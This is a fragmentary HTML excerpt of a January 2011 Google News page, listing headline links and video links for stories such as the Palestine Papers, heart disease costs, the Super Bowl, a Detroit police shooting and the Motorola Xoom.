...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNElKv0GNcBZgzUQCULJE3OQ6oz6jw " href="http://online.wsj.com/article/SB10001424052748704279704576102242255911216.html?mod=googlenews_wsj" id="MAA4AEgLUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=Id_W6wgEIGo">Video: 
Palestine Papers spark fury in Ramallah
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.guardian.co.uk/world/2011/jan/24/papers-palestinian-leaders-refugees-fight" target="_blank" class="usg-AFQjCNGGya3F-AttIyCGzX9tofIwFV9hxA " id="MAA4AEgLUAFgAmoCdXM">Papers reveal how Palestinian leaders gave up fight over refugees</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEaadv9eEgCosx3Fx9YrK8VmjQUUA " href="http://www.jpost.com/MiddleEast/Article.aspx?id=205065" id="MAA4AEgLUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNECRhzSqEJbRN9fKfxZ08aW9SDk8A " href="http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12270504" id="MAA4AEgLUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHoZJ4kqbRh3uXH99xaN2e36i18eg " href="http://english.aljazeera.net/palestinepapers/2011/01/201112412224387862.html" id="MAA4AEgLUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEV93objFvHJXFeDa0meWiOJcehyw " href="http://www.dailytimes.com.pk/default.asp?page=2011%5C01%5C25%5Cstory_25-1-2011_pg4_1" id="MAA4AEgLUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.foxnews.com/health/2011/01/24/report-heart-disease-costs-triple/" class="usg-AFQjCNEABo5vi1V46W0WvRcqWvag9t1vuw " title="Fox News"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/mwTGtKZ4NInPwM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.foxnews.com/health/2011/01/24/report-heart-disease-costs-triple/" class="usg-AFQjCNEABo5vi1V46W0WvRcqWvag9t1vuw "> Fox News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFDfn7oAgiO1bwSefFQwDxUfjYx7w " href="http://www.webmd.com/heart-disease/news/20110123/heart-disease-treatment-costs-may-triple-in-next-20-years" id="MAA4AEgMUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://health.usnews.com/health-news/family-health/heart/articles/2011/01/24/lowering-bp-can-help-cut-womens-heart-disease-risk.html" target="_blank" class="usg-AFQjCNGMewBDUXKRrXbz9dDPgk2CfatYqg " id="MAA4AEgMUAFgAmoCdXM">Lowering BP Can Help Cut Women's Heart Disease Risk</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.businessweek.com/lifestyle/content/healthday/649165.html" target="_blank" class="usg-AFQjCNFTF19UjawTG0U74K1vgENiWJteKg " id="MAA4AEgMUAJgAmoCdXM">U.S. Heart Disease Costs Expected to Soar</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG3XToTSrtKhlkI7xZ-Y6ypAF1H4g " href="http://www.msnbc.msn.com/id/41234780/ns/health-heart_health/" id="MAA4AEgMUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEShwCjRPP3o8B9Bknfl-uNzkHnTg " href="http://www.bloomberg.com/news/2011-01-24/heart-disease-treatment-cost-to-triple-to-818-billion-by-2030-group-says.html" id="MAA4AEgMUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGcfD1knVticOCLd49-9hkVxr9FiA " href="http://ozarksfirst.com/fulltext?nxd_id=391716" id="MAA4AEgMUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHbJTmNGEga0s_5dekJF3wI_kJcFw " href="http://www.prnewswire.com/news-releases/american-heart-association-rapid-access-journal-report-lowering-blood-pressure-in-middle-aged-women-reduces-heart-disease-risk-114504829.html" id="MAA4AEgMUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/sports/football/tom-brady-a-unanimous-ap-all-pro/article1881082/" class="usg-AFQjCNEysYm69ZDXP4EpTrC80dSrklUIwA " title="Globe and Mail"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/8VFR3JrwXIVmeM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/sports/football/tom-brady-a-unanimous-ap-all-pro/article1881082/" class="usg-AFQjCNEysYm69ZDXP4EpTrC80dSrklUIwA "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEceaM8GMTGP7YZHD2H7DN0PklU7g " href="http://www.bostonherald.com/sports/football/patriots/view.bg?articleid=1311662&srvc=rss" id="MAA4AEgNUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://espn.go.com/blog/boston/new-england-patriots/post?id=4692316" target="_blank" class="usg-AFQjCNFXDwzIsfpbYW4xLUwi4UyNPddplA " id="MAA4AEgNUAFgAmoCdXM">Brady unanimous choice as AP All-Pro</a>
...[SNIP]...
<div class="aa-inner"><a href="http://musketfire.com/2011/01/24/three-patriots-make-the-all-pro-team/" target="_blank" class="usg-AFQjCNGS3y2ZauZ7IEGNf6kOGpRFYvxByw " id="MAA4AEgNUAJgAmoCdXM">Three Patriots Make the All-Pro Team</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFtVmCzgJetNQA3YuO6D6T2xCsrGQ " href="http://www.boston.com/sports/football/patriots/extra_points/2011/01/tom_brady_unani.html" id="MAA4AEgNUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGDZvJMjOxvPGWf0GTtpiYowmX3nw " href="http://itiswhatitis.weei.com/sports/newengland/football/patriots/2011/01/24/brady-mayo-mankins-named-all-pro/" id="MAA4AEgNUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHvwv1Cu4OL92x3XwJPQZYjdPrTWQ " href="http://www.rotoworld.com/content/playerpages/playerbreakingnews.asp?sport=NFL&id=1163&line=199317&spln=1" id="MAA4AEgNUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/news/world/americas/gunman-killed-4-officers-injured-in-detroit-shooting/article1880253/" class="usg-AFQjCNGuYuLMS3bhVS72CPyhcq21BqLxTQ " title="Globe and Mail"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/w_tEYbzpZ15crM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/news/world/americas/gunman-killed-4-officers-injured-in-detroit-shooting/article1880253/" class="usg-AFQjCNGuYuLMS3bhVS72CPyhcq21BqLxTQ "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHS5uJx4olbyF9osDF3gTDGuyuCPg " href="http://www.usatoday.com/news/nation/2011-01-24-detroit-shooting_N.htm" id="MAA4AEgOUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=3i4eR4POFOw">Video: 
Detroit rape suspect to be arraigned on several assault counts.
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.detnews.com/article/20110124/METRO01/101240374/1409/metro/Detroit-rape-suspect--31--has-spent-almost-half-his-life-in-prison" target="_blank" class="usg-AFQjCNHDjiKWPniNGy7SY6MsW0KH4Ih34Q " id="MAA4AEgOUAFgAmoCdXM">Detroit rape suspect, 31, has spent almost half his life in prison</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEalDUBH8-HQVONhcKZ4MW2d5rlSw " href="http://www.freep.com/article/20110124/NEWS05/101240382/1007/news05/4-officers-shot-gunman-dead-in-horrifying-attack" id="MAA4AEgOUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHCCEQVPyyjZin-IgS-GZbKQg96lw " href="http://www.cnn.com/2011/CRIME/01/24/michigan.rape.suspect/?hpt=T2" id="MAA4AEgOUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFr6r5QBoathNzT09PJwnvBUwlkuA " href="http://www.nytimes.com/2011/01/24/us/24detroit.html?src=twrhp" id="MAA4AEgOUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/sports/football/packers-headed-to-super-bowl/article1880207/" class="usg-AFQjCNHIiFUxa3AEXZn1vUtKyl5UV-ph3A " title="Globe and Mail"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/E4wG-9FiV5eTAM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/sports/football/packers-headed-to-super-bowl/article1880207/" class="usg-AFQjCNHIiFUxa3AEXZn1vUtKyl5UV-ph3A "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFGDQxlf2HkP_kY_tNzY5iMi_-1RQ " href="http://content.usatoday.com/communities/thehuddle/post/2011/01/donald-driver-super-bowl-vs-steelers-is-packers-to-lose/1" id="MAA4AEgPUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=6_dUkNdoPZI">Video: 
Raw Video: Packers Fans Rejoice in NFC Title
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.sportingnews.com/nfl/feed/2011-01/super-bowl-xlv/story/roethlisberger-rodgers-look-to-bounce-back-in-super-bowl" target="_blank" class="usg-AFQjCNGQElfXImuP5gjNiO4sKtARSBFJYA " id="MAA4AEgPUAFgAmoCdXM">Roethlisberger, Rodgers look to bounce back in Super Bowl</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHPpTk4ieUXgu-P8RRRMf8MWo7J0w " href="http://www.nfl.com/news/story/09000d5d81de4791/article/steelers-packers-provide-plan-for-others-to-find-success" id="MAA4AEgPUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGPrr0vkoRqaEiQt3vFQA_4L6QnyA " href="http://www.chron.com/disp/story.mpl/ap/tx/7395456.html" id="MAA4AEgPUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHJIPZyVcw6wNepnm-LyDHFaO6Clg " href="http://profootballtalk.nbcsports.com/2011/01/24/packers-fans-not-happy-with-treatment-in-chicago/" id="MAA4AEgPUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHhneFPmAPUa6G6iZ-Yzxn3ptkaaw " href="http://www.jsonline.com/news/milwaukee/114509574.html" id="MAA4AEgPUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://abcnews.go.com/US/wireStory?id=12742296" class="usg-AFQjCNGaSXymdf0g6zpz8vX8gCPsRxZeLg " title="ABC News"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/4qo0wQiEBATaaM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://abcnews.go.com/US/wireStory?id=12742296" class="usg-AFQjCNGaSXymdf0g6zpz8vX8gCPsRxZeLg "> ABC News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHD9gmMcX5UbuSNEialO4A3C839Zg " href="http://online.wsj.com/article/BT-CO-20110124-713737.html" id="MAA4AEgQUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://chicagobreakingbusiness.com/2011/01/cantor-declares-state-bankruptcy-law-doa.html" target="_blank" class="usg-AFQjCNGdoU1Lh67pcIeV49PyT7DoCZ4pRg " id="MAA4AEgQUAJgAmoCdXM">Cantor declares state bankruptcy law DOA</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFsJ-xmO_ejoSJAqbQS-S39fJbZpg " href="http://www.reuters.com/article/idUSN2419775920110124" id="MAA4AEgQUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGhzLhkbOVz53QHJ6bmW7YycCP-lA " href="http://latimesblogs.latimes.com/money_co/2011/01/eric-cantor-states-bankruptcy-bailouts-house-majority-leader-gingrich.html" id="MAA4AEgQUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGYGF2tFrtqpMAo1sUiv4XCv4MgNA " href="http://tpmdc.talkingpointsmemo.com/2011/01/republicans-in-a-fix-on-infrastructure-spending.php" id="MAA4AEgQUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHVSFWw5bW8lOlkPcETmuGH7fJddA " href="http://voices.washingtonpost.com/44/2011/01/eric-cantor-president-obama-wa.html" id="MAA4AEgQUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N4VB20110124" class="usg-AFQjCNGObH-rlW5oa-v0qUrmayFvL9u0zg " title="Reuters"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/PTWrrKWFPhkNhM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N4VB20110124" class="usg-AFQjCNGObH-rlW5oa-v0qUrmayFvL9u0zg "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNG6qrigwK0jGaJWzKxvUijw-g-xcA " href="http://sports.espn.go.com/new-york/nfl/news/story?id=6054732&campaign=rss&source=NFLHeadlines" id="MAA4AEgRUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=Dye1RPvkcB0">Video: 
Jets lose to Steelers in AFC championship game
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://itiswhatitis.weei.com/sports/newengland/football/patriots/2011/01/24/rex-ryan-jets-have-done-a-pretty-good-job-of-beating-patriots/" target="_blank" class="usg-AFQjCNEl1IHYaTs16CTlgmfI4z1L2yr4yg " id="MAA4AEgRUAFgAmoCdXM">Rex Ryan: Jets have 'done a pretty good job' of beating Patriots</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHfEBCN-dtPvPOTD0kDPV0P8d3Q1Q " href="http://online.wsj.com/article/APa59ba6dc9ce0453e8a616202c7484b68.html" id="MAA4AEgRUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG2AZEXbdt5AYsMtu8msDEkOt-3Fw " href="http://content.usatoday.com/communities/thehuddle/post/2011/01/rex-ryan-jets-have-to-learn-to-beat-more-than-just-patriots/1" id="MAA4AEgRUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFLYIutFWp_mZm9Ukmjx0jnqY1qmQ " href="http://www.ajc.com/sports/jets-qb-sanchez-optimistic-814203.html" id="MAA4AEgRUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/news/world/africa-mideast/ivory-coasts-ouattara-calls-for-cocoa-export-ban/article1880409/" class="usg-AFQjCNFUbFimVtitAMjquhLMn2StbziAyQ " title="Globe and Mail"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/PxjjM3Orb87AzM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/news/world/africa-mideast/ivory-coasts-ouattara-calls-for-cocoa-export-ban/article1880409/" class="usg-AFQjCNFUbFimVtitAMjquhLMn2StbziAyQ "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNG3JzDql7WAkcCHRYSnsAbbGadxAg " href="http://www.voanews.com/english/news/africa/Nigeria-Wants-UN-Backing-for-Military-Intervention-in-Ivory-Coast-114510399.html" id="MAA4AEgSUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012404718.html" target="_blank" class="usg-AFQjCNH8xyRSjagQTe7qcKbQ1RxMrRntiw " id="MAA4AEgSUAFgAmoCdXM">US backs ban on Ivory Coast cocoa imports</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.bloomberg.com/news/2011-01-24/summary-box-ivory-coast-might-ban-cocoa-exports.html" target="_blank" class="usg-AFQjCNFvQyMenWhWCi8Scnr2HQOzz1Myqw " id="MAA4AEgSUAJgAmoCdXM">Summary Box: Ivory Coast might ban cocoa exports</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE8w5-3wv-Joef82tAEi3WkRMlKBg " href="http://abcnews.go.com/Business/wireStory?id=12751095" id="MAA4AEgSUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGEkYfaKL41vivSMDYuj5cNE_tgpw " href="http://www.dailytimes.com.pk/default.asp?page=2011%5C01%5C25%5Cstory_25-1-2011_pg4_3" id="MAA4AEgSUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHt7HNh28TuTa201PSzxavp-qCB9w " href="http://www.reuters.com/article/idUSTRE70N66I20110124" id="MAA4AEgSUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5P220110124" class="usg-AFQjCNHe6Eb7ocpi6F9HMD_xPO3C4NQ3CQ " title="Reuters"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/M2eWhkFHXWq5TM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5P220110124" class="usg-AFQjCNHe6Eb7ocpi6F9HMD_xPO3C4NQ3CQ "> Reuters </a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.pcmag.com/article2/0,2817,2376180,00.asp" target="_blank" class="usg-AFQjCNEeedKNUlqWQgoNsXULz0osRTWeaQ " id="MAA4AEgTUAFgAmoCdXM">Twitter's Ad Revenue Predicted to Pass MySpace</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.emarketer.com/Article.aspx?R=1008192" target="_blank" class="usg-AFQjCNFHIkw8yyxLm5eiE9NU2pbWrOnIXQ " id="MAA4AEgTUAJgAmoCdXM">Twitter Ad Revenues to Soar This Year</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHe6Eb7ocpi6F9HMD_xPO3C4NQ3CQ " href="http://www.reuters.com/article/idUSTRE70N5P220110124" id="MAA4AEgTUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFZO8otCjpSj5AP5vwSF4Llgt--JA " href="http://www.bloomberg.com/news/2011-01-24/twitter-s-advertising-revenue-may-triple-to-150-million-emarketer-says.html" id="MAA4AEgTUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHEmKzfFERxkTqgK7-nDAlnLBvvlg " href="http://www.digitaltrends.com/computing/twitter-advertising-revenue-swiftly-challenging-myspace/" id="MAA4AEgTUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGVukQYF2CS02hBDpoVNsgSl2Vhrg " href="http://business.newsfactor.com/story.xhtml?story_id=12000005I4S0" id="MAA4AEgTUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://content.usatoday.com/communities/onpolitics/post/2011/01/michele-bachmann-tea-party-sotu-response-/1" class="usg-AFQjCNEQHKiw9TKQgRYUmMwzm3YZzn7Z0g " title="USA Today"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/_lRM2j82QTbMDM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://content.usatoday.com/communities/onpolitics/post/2011/01/michele-bachmann-tea-party-sotu-response-/1" class="usg-AFQjCNEQHKiw9TKQgRYUmMwzm3YZzn7Z0g "> USA Today </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGAfsCM8qVY21SNmrGDm9XDV7AnAg " href="http://www.csmonitor.com/USA/Politics/The-Vote/2011/0124/Scalia-addresses-Tea-Party-Caucus-but-should-he" id="MAA4AEgUUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.cbsnews.com/8301-503544_162-20029369-503544.html" target="_blank" class="usg-AFQjCNH9dvJ6QMshI9GB-37Wn9ge8VjujA " id="MAA4AEgUUAFgAmoCdXM">Scalia Lectures Lawmakers - Behind Closed Doors</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.politico.com/news/stories/0111/48043.html" target="_blank" class="usg-AFQjCNHS1xbvITXJO9BTabNhSXTloex_3A " id="MAA4AEgUUAJgAmoCdXM">Tea time for Antonin Scalia</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFuFRTvug7VlSqLII_mmBygDvrNnQ " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/21/AR2011012106553.html" id="MAA4AEgUUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHFjYfu7P8THOH4gtZWKzOYxjSmkg " href="http://www.cnn.com/2011/US/01/21/scotus.scalia.tea.party/" id="MAA4AEgUUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHNIlI2w06i8a1hNzLJ7zkDAMDlTw " href="http://www.bloomberg.com/news/2011-01-24/bachmann-s-tea-party-caucus-to-host-high-court-justice-scalia.html" id="MAA4AEgUUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEQHKiw9TKQgRYUmMwzm3YZzn7Z0g " href="http://content.usatoday.com/communities/onpolitics/post/2011/01/michele-bachmann-tea-party-sotu-response-/1" id="MAA4AEgUUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.computerworld.com/s/article/9206080/Motorola_Xoom_to_launch_on_Feb._17_priced_at_700_report_says" class="usg-AFQjCNHVkBCpHSqCvo6_iJ3QeAte9R4HtQ " title="Computerworld"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/daFSu9xUqylQ5M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.computerworld.com/s/article/9206080/Motorola_Xoom_to_launch_on_Feb._17_priced_at_700_report_says" class="usg-AFQjCNHVkBCpHSqCvo6_iJ3QeAte9R4HtQ "> Computerwor... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHN9PKHYEKTa2KbqrEgQddEwTWgIw " href="http://techland.time.com/2011/01/24/motorola-xoom-tablet-tipped-for-february-17-release-at-700/" id="MAA4AEgVUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.pcmag.com/article2/0,2817,2376161,00.asp" target="_blank" class="usg-AFQjCNGKiHjC_kakoEG8A44FhwtCe2AHAg " id="MAA4AEgVUAFgAmoCdXM">Reports: Motorola Xoom to Cost About the Same as 32GB iPad</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.pcworld.com/businesscenter/article/217509/motorola_xoom_tablets_price_will_shoot_it_in_the_foot.html" target="_blank" class="usg-AFQjCNELXhCiOQGRPhUbTNbYaBMofmmhCA " id="MAA4AEgVUAJgAmoCdXM">Motorola Xoom Tablet's Price Will Shoot It in the Foot</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHYFaiEpBfJtoQNCxiTBsYvMlBrJg " href="http://news.cnet.com/8301-17852_3-20029268-71.html" id="MAA4AEgVUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH8bZiGGhCNt2S7b-uGLUlcP2m-Bw " href="http://arstechnica.com/gadgets/news/2011/01/report-motorola-xoom-to-launch-february-17-for-around-700.ars" id="MAA4AEgVUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGqPg2wGubRAMYVqwEuEZMwagOScw " href="http://voices.washingtonpost.com/fasterforward/2011/01/reports_xoom_release_date_is_f.html" id="MAA4AEgVUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF67MVvZezEMdstKe1ABRVW1iIdfw " href="http://www.msnbc.msn.com/id/41220540/ns/business-motley_fool/" id="MAA4AEgVUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://espn.go.com/espn/page2/index?id=6054739" class="usg-AFQjCNFGoGNleixTSVIz74P5THQvla9iuA " title="ESPN"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/lwOfOh7k2QfPWM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://espn.go.com/espn/page2/index?id=6054739" class="usg-AFQjCNFGoGNleixTSVIz74P5THQvla9iuA "> ESPN </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNERsQsvwArMESZUIAdaSjLBqFVtiw " href="http://newsroom.mtv.com/2011/01/24/christina-aguilera-super-bowl-national-anthem/" id="MAA4AEgWUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://idolator.com/5748782/christina-aguilera-super-bowl" target="_blank" class="usg-AFQjCNHKyGnLj6ovxPmg0Knrcv05rRgDNA " id="MAA4AEgWUAFgAmoCdXM">Christina Aguilera To Belt Out National Anthem At The Super Bowl</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.allheadlinenews.com/briefs/articles/90031962?Christina%20Aguilera%20to%20perform%20National%20Anthem%20at%20this%20year's%20Super%20Bowl" target="_blank" class="usg-AFQjCNE7tavSyVtGLdaBmnCMH0pYaPcRXQ " id="MAA4AEgWUAJgAmoCdXM">Christina Aguilera to perform National Anthem at this year's Super Bowl</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEpDJgJFt_j6AUHmRc1hYxeEhYaug " href="http://dallas.sbnation.com/dallas-cowboys/2011/1/24/1953866/super-bowl-xlv-in-dallas-christina-aguilera-to-sing-national-anthem" id="MAA4AEgWUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFXw3IOVm2JgObaxcOZTKNiNvTkvA " href="http://www.thehollywoodgossip.com/2011/01/christina-aguilera-to-sing-national-anthem-at-super-xlv/" id="MAA4AEgWUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG9O3H7YyZsvF7VtGk2uLQJoCms_Q " href="http://www.reuters.com/article/idUSTRE70N5SV20110124" id="MAA4AEgWUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHuRW99pHyRx8E4ZBUlILkq6z7ziA " href="http://www.thestar.com/sports/football/article/927264--super-bowl-notes-aguilera-to-croon-anthem" id="MAA4AEgWUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHiERdzKjGz_owcJAKwYgaq2jAmhQ " href="http://www.cnn.com/2011/WORLD/africa/01/24/winds.change/?hpt=C1" id="-9130425399277123681"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHUIAy8iUF8AYKI9an-TtV9uy8Ftw " href="http://www.foxnews.com/world/2011/01/24/ap-interview-iaea-critical-irans-cooperation/" id="415738970037031730"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHBvFgzzTzx9w0WGdmzzseti6ngaQ " href="http://www.reuters.com/article/idUSTRE70N6U520110124" id="1857102735582363016"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEK2ud_k0F8qRyqgsh-kAYgITivyQ " href="http://voices.washingtonpost.com/capitalsinsider/matt-hendricks/video-matt-hendricks-answers-y.html" id="MAE4AEgAUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEYW-eOsdylgGuCJv1odl_DRoolHg " href="http://voices.washingtonpost.com/dr-gridlock/2011/01/bill_would_allow_mcdonnell_to.html" id="MAE4AEgBUABgAmoCdXM"><span class="titletext">
...[SNIP]...
